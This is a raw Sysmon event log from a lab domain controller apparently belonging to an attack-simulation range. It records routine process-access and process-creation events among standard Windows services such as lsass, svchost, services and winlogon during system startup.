15:51:00.628{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000811Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.628{D28789B6-7C62-5FA1-0B00-000000008801}86896C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000810Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.628{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000809Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.628{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000808Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.613{D28789B6-7C62-5FA1-0B00-000000008801}86896C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000807Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.613{D28789B6-7C62-5FA1-0A00-000000008801}8521184C:\Windows\system32\services.exe{D28789B6-7C64-5FA1-1200-000000008801}1216C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000806Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.613{D28789B6-7C62-5FA1-0A00-000000008801}8521188C:\Windows\system32\services.exe{D28789B6-7C64-5FA1-1300-000000008801}1224C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000805Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.613{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1200-000000008801}1216C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000804Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.613{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1300-000000008801}1224C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000803Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.613{D28789B6-7C64-5FA1-0E00-000000008801}10801232C:\Windows\system32\LogonUI.exe{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\logoncontroller.dll+2dfb5|C:\Windows\System32\RPCRT4.dll+50b34|C:\Windows\System32\RPCRT4.dll+25cd0|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000802Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.613{D28789B6-7C62-5FA1-0800-000000008801}724740C:\Windows\system32\csrss.exe{D28789B6-7C64-5FA1-1100-000000008801}1204C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000801Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.613{D28789B6-7C62-5FA1-0900-000000008801}7801064C:\Windows\system32\winlogon.exe{D28789B6-7C64-5FA1-1100-000000008801}1204C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\dwminit.dll+2d11|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000800Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.615{D28789B6-7C64-5FA1-1100-000000008801}1204C:\Windows\System32\dwm.exe10.0.14393.0 (rs1_release.160715-1616)Desktop Window ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationdwm.exe"dwm.exe"C:\Windows\system32\Window Manager\DWM-1{D28789B6-7C64-5FA1-E9B1-000000000000}0xb1e91SystemMD5=C89F159A577F19F7F03C73C98D29D841,SHA256=B3E37997C1C62DD90D69EF83D6A6FC782BF9A5B8AD04A0D1528A8B7FA31AA408,IMPHASH=DDB7DE3741333EE031929A760FCD4542{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\System32\winlogon.exewinlogon.exe 10341000x8000000000000000799Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.613{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C64-5FA1-1200-000000008801}1216C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000798Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.613{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7C64-5FA1-1300-000000008801}1224C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000797Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.613{D28789B6-7C62-5FA1-0A00-000000008801}852940C:\Windows\system32\services.exe{D28789B6-7C64-5FA1-1300-000000008801}1224C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000796Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.613{D28789B6-7C62-5FA1-0A00-000000008801}8521132C:\Windows\system32\services.exe{D28789B6-7C64-5FA1-1200-000000008801}1216C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000795Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.616{D28789B6-7C64-5FA1-1300-000000008801}1224C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\system32\svchost.exe -k LocalServiceC:\Windows\system32\NT AUTHORITY\LOCAL SERVICE{D28789B6-7C64-5FA1-E503-000000000000}0x3e50SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x8000000000000000794Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.613{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1c030|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000793Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.613{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.613{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.597{D28789B6-7C62-5FA1-0A00-000000008801}8521184C:\Windows\system32\services.exe{D28789B6-7C64-5FA1-0F00-000000008801}1136C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.597{D28789B6-7C62-5FA1-0A00-000000008801}8521184C:\Windows\system32\services.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.597{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-0F00-000000008801}1136C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.597{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.597{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000786Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.597{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7C64-5FA1-0F00-000000008801}1136C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000785Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.597{D28789B6-7C62-5FA1-0A00-000000008801}852952C:\Windows\system32\services.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 